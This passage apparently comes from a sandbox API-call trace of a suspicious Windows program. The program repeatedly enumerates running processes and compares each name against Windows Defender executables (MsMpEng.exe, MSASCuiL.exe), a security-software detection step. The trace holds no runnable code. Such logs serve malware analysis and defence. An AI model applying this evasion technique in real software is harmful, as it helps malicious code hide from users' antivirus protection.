th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.948] lstrcmpiW (lpString1="explorer.exe", lpString2="MsMpEng.exe") returned -1 [0139.948] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0139.949] lstrcmpiW (lpString1="dwm.exe", lpString2="MsMpEng.exe") returned -1 [0139.949] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.950] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.950] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.951] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MsMpEng.exe") returned 1 [0139.951] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.952] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0139.952] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.953] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.953] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0139.954] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MsMpEng.exe") returned 1 [0139.954] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0139.955] lstrcmpiW (lpString1="taskeng.exe", lpString2="MsMpEng.exe") returned 1 [0139.955] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0139.956] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MsMpEng.exe") returned 1 [0139.956] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.956] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0139.956] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="measurements-cocktail-motivation.exe")) returned 1 [0139.957] lstrcmpiW (lpString1="measurements-cocktail-motivation.exe", lpString2="MsMpEng.exe") returned -1 [0139.957] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur_travelling_usage.exe")) returned 1 [0140.009] lstrcmpiW (lpString1="arthur_travelling_usage.exe", lpString2="MsMpEng.exe") returned -1 [0140.009] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zdnet.exe")) returned 1 [0140.010] lstrcmpiW (lpString1="zdnet.exe", lpString2="MsMpEng.exe") returned 1 [0140.010] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zufilmenyc.exe")) returned 1 [0140.011] lstrcmpiW (lpString1="zufilmenyc.exe", lpString2="MsMpEng.exe") returned 1 [0140.011] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bangbus.exe")) returned 1 [0140.012] lstrcmpiW (lpString1="bangbus.exe", lpString2="MsMpEng.exe") returned -1 [0140.012] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dee_flour.exe")) returned 1 [0140.013] lstrcmpiW (lpString1="dee_flour.exe", lpString2="MsMpEng.exe") returned -1 [0140.013] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressionmed.exe")) returned 1 [0140.014] lstrcmpiW (lpString1="expressionmed.exe", lpString2="MsMpEng.exe") returned -1 [0140.014] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inclusive.exe")) returned 1 [0140.015] lstrcmpiW (lpString1="inclusive.exe", lpString2="MsMpEng.exe") returned -1 [0140.015] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovation-painful-resulting.exe")) returned 1 [0140.016] lstrcmpiW (lpString1="innovation-painful-resulting.exe", lpString2="MsMpEng.exe") returned -1 [0140.016] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="political-guide.exe")) returned 1 [0140.017] lstrcmpiW (lpString1="political-guide.exe", lpString2="MsMpEng.exe") returned 1 [0140.017] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blvd.exe")) returned 1 [0140.018] lstrcmpiW (lpString1="blvd.exe", lpString2="MsMpEng.exe") returned -1 [0140.018] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mails_users.exe")) returned 1 [0140.019] lstrcmpiW (lpString1="mails_users.exe", lpString2="MsMpEng.exe") returned -1 [0140.019] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trading.exe")) returned 1 [0140.019] lstrcmpiW (lpString1="trading.exe", lpString2="MsMpEng.exe") returned 1 [0140.020] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0140.021] lstrcmpiW (lpString1="declare.exe", lpString2="MsMpEng.exe") returned -1 [0140.021] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sake_psp.exe")) returned 1 [0140.022] lstrcmpiW (lpString1="sake_psp.exe", lpString2="MsMpEng.exe") returned 1 [0140.022] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="renewable-loss-purpose.exe")) returned 1 [0140.023] lstrcmpiW (lpString1="renewable-loss-purpose.exe", lpString2="MsMpEng.exe") returned 1 [0140.023] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation large.exe")) returned 1 [0140.024] lstrcmpiW (lpString1="nation large.exe", lpString2="MsMpEng.exe") returned 1 [0140.024] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conflicts_thermal_himself.exe")) returned 1 [0140.025] lstrcmpiW (lpString1="conflicts_thermal_himself.exe", lpString2="MsMpEng.exe") returned -1 [0140.025] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wonder_transmit_petersburg.exe")) returned 1 [0140.026] lstrcmpiW (lpString1="wonder_transmit_petersburg.exe", lpString2="MsMpEng.exe") returned 1 [0140.026] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0140.027] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MsMpEng.exe") returned 1 [0140.027] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.027] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0140.028] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0140.028] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MsMpEng.exe") returned 1 [0140.028] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0140.029] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MsMpEng.exe") returned 1 [0140.029] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.030] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0140.030] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.031] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0140.031] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0140.032] lstrcmpiW (lpString1="conhost.exe", lpString2="MsMpEng.exe") returned -1 [0140.032] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x894, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0140.033] lstrcmpiW (lpString1="powershell.exe", lpString2="MsMpEng.exe") returned 1 [0140.033] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp7149.exe")) returned 1 [0140.034] lstrcmpiW (lpString1="tmp7149.exe", lpString2="MsMpEng.exe") returned 1 [0140.034] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x528, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x668, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.035] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0140.035] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x668, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.035] lstrcmpiW (lpString1="cmd.exe", lpString2="MsMpEng.exe") returned -1 [0140.035] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x668, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0140.037] CloseHandle (hObject=0x12c) returned 1 [0140.037] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x128 [0140.042] Process32FirstW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.042] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCuiL.exe") returned -1 [0140.042] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0140.043] lstrcmpiW (lpString1="System", lpString2="MSASCuiL.exe") returned 1 [0140.043] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0140.043] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCuiL.exe") returned 1 [0140.044] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.044] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0140.044] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0140.045] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCuiL.exe") returned 1 [0140.045] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.045] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCuiL.exe") returned -1 [0140.045] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0140.046] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCuiL.exe") returned 1 [0140.046] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0140.046] lstrcmpiW (lpString1="services.exe", lpString2="MSASCuiL.exe") returned 1 [0140.046] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0140.047] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCuiL.exe") returned -1 [0140.047] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0140.048] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCuiL.exe") returned -1 [0140.048] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.049] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.049] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.050] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.050] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.051] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.051] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.061] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.061] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.062] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.062] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0140.063] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCuiL.exe") returned -1 [0140.063] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.064] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.064] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0140.065] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCuiL.exe") returned -1 [0140.065] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0140.066] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCuiL.exe") returned -1 [0140.066] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.067] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.067] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0140.068] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCuiL.exe") returned 1 [0140.068] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0140.069] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.069] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.070] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0140.070] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0140.071] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCuiL.exe") returned 1 [0140.071] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0140.072] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCuiL.exe") returned 1 [0140.072] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, 